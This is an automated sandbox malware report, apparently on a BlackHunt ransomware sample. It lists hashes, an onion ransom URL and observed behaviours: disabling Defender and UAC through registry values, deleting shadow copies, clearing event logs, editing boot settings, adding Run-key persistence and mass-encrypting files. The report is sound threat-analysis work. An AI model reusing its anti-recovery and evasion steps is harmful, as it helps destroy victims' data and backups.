Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 22:59
Static task
static1
Behavioral task
behavioral1
Sample
34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe
Resource
win10v2004-20231222-en
General
-
Target
34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe
-
Size
707KB
-
MD5
c43a2a88ffd2fa5fc37efd3cca1a2a09
-
SHA1
909c06e22448f91d9d953abdd79d9058a5de5ea5
-
SHA256
34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39
-
SHA512
d86d213c3f0f1fd6af7d2597b9070446f75520ce4c716f89ed0e5ce4f29b4b1073673757d2f0fd5afc8926634aaf6b22ba30cca458ca999ab3574ab2d57d4c59
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1m8avnh:6uaTmkZJ+naie5OTamgEoKxLWN0h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1656 fsutil.exe 4176 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 5084 wevtutil.exe 3372 wevtutil.exe 3432 wevtutil.exe 2424 wevtutil.exe 3560 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1716 bcdedit.exe 1648 bcdedit.exe 1228 bcdedit.exe 3400 bcdedit.exe -
Renames multiple (2901) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1640 wbadmin.exe 2644 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3340 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\R: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\I: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\O: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\S: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\A: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\W: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\E: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\K: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\B: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\P: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\J: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\Z: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\X: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\V: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\Q: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\Y: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\H: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\G: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\L: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\N: 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\#BlackHunt_ReadMe.hta 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#BlackHunt_Private.key 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#BlackHunt_ReadMe.txt 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#BlackHunt_ReadMe.txt 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\#BlackHunt_ReadMe.hta 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_ReadMe.txt 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UCT 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Berlin 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground_PAL.wmv 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jre7\lib\zi\America\#BlackHunt_ReadMe.hta 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\#BlackHunt_ReadMe.txt 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\#BlackHunt_Private.key 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\#BlackHunt_ReadMe.txt 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#BlackHunt_Private.key 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_Private.key 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#BlackHunt_ReadMe.txt 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jre7\bin\plugin2\#BlackHunt_ReadMe.hta 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_ReadMe.hta 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_Private.key 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_ReadMe.hta 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\#BlackHunt_ReadMe.hta 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#BlackHunt_ReadMe.hta 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1152 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 480 vssadmin.exe 2944 vssadmin.exe 1056 vssadmin.exe 1728 vssadmin.exe 3532 vssadmin.exe 276 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2736 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3672 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2320 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Token: SeRestorePrivilege 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Token: SeBackupPrivilege 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Token: SeTakeOwnershipPrivilege 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Token: SeAuditPrivilege 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Token: SeSecurityPrivilege 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Token: SeIncBasePriorityPrivilege 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Token: SeBackupPrivilege 1192 cmd.exe Token: SeRestorePrivilege 1192 cmd.exe Token: SeAuditPrivilege 1192 cmd.exe Token: SeBackupPrivilege 1528 wbengine.exe Token: SeRestorePrivilege 1528 wbengine.exe Token: SeSecurityPrivilege 1528 wbengine.exe Token: SeSecurityPrivilege 3372 wevtutil.exe Token: SeBackupPrivilege 3372 wevtutil.exe Token: SeSecurityPrivilege 5084 wevtutil.exe Token: SeSecurityPrivilege 3560 wevtutil.exe Token: SeBackupPrivilege 5084 wevtutil.exe Token: SeBackupPrivilege 3560 wevtutil.exe Token: SeSecurityPrivilege 3432 wevtutil.exe Token: SeBackupPrivilege 3432 wevtutil.exe Token: SeSecurityPrivilege 2424 wevtutil.exe Token: SeBackupPrivilege 2424 wevtutil.exe Token: SeDebugPrivilege 2736 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2196 wrote to memory of 2176 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 156 PID 2196 wrote to memory of 2176 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 156 PID 2196 wrote to memory of 2176 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 156 PID 2196 wrote to memory of 2176 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 156 PID 2196 wrote to memory of 2132 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 154 PID 2196 wrote to memory of 2132 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 154 PID 2196 wrote to memory of 2132 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 154 PID 2196 wrote to memory of 2132 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 154 PID 2196 wrote to memory of 2124 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 152 PID 2196 wrote to memory of 2124 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 152 PID 2196 wrote to memory of 2124 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 152 PID 2196 wrote to memory of 2124 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 152 PID 2176 wrote to memory of 2512 2176 cmd.exe 150 PID 2176 wrote to memory of 2512 2176 cmd.exe 150 PID 2176 wrote to memory of 2512 2176 cmd.exe 150 PID 2196 wrote to memory of 2788 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 149 PID 2196 wrote to memory of 2788 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 149 PID 2196 wrote to memory of 2788 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 149 PID 2196 wrote to memory of 2788 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 149 PID 2196 wrote to memory of 2616 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 146 PID 2196 wrote to memory of 2616 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 146 PID 2196 wrote to memory of 2616 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 146 PID 2196 wrote to memory of 2616 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 146 PID 2196 wrote to memory of 2644 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 145 PID 2196 wrote to memory of 2644 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 145 PID 2196 wrote to memory of 2644 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 145 PID 2196 wrote to memory of 2644 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 145 PID 2196 wrote to memory of 2572 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 143 PID 2196 wrote to memory of 2572 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 143 PID 2196 wrote to memory of 2572 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 143 PID 2196 wrote to memory of 2572 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 143 PID 2124 wrote to memory of 2880 2124 cmd.exe 141 PID 2124 wrote to memory of 2880 2124 cmd.exe 141 PID 2124 wrote to memory of 2880 2124 cmd.exe 141 PID 2196 wrote to memory of 2712 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 140 PID 2196 wrote to memory of 2712 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 140 PID 2196 wrote to memory of 2712 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 140 PID 2196 wrote to memory of 2712 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 140 PID 2196 wrote to memory of 2552 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 139 PID 2196 wrote to memory of 2552 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 139 PID 2196 wrote to memory of 2552 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 139 PID 2196 wrote to memory of 2552 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 139 PID 2132 wrote to memory of 3048 2132 cmd.exe 137 PID 2132 wrote to memory of 3048 2132 cmd.exe 137 PID 2132 wrote to memory of 3048 2132 cmd.exe 137 PID 2196 wrote to memory of 2580 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 136 PID 2196 wrote to memory of 2580 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 136 PID 2196 wrote to memory of 2580 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 136 PID 2196 wrote to memory of 2580 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 136 PID 2196 wrote to memory of 2800 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 30 PID 2196 wrote to memory of 2800 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 30 PID 2196 wrote to memory of 2800 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 30 PID 2196 wrote to memory of 2800 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 30 PID 2196 wrote to memory of 1192 2196 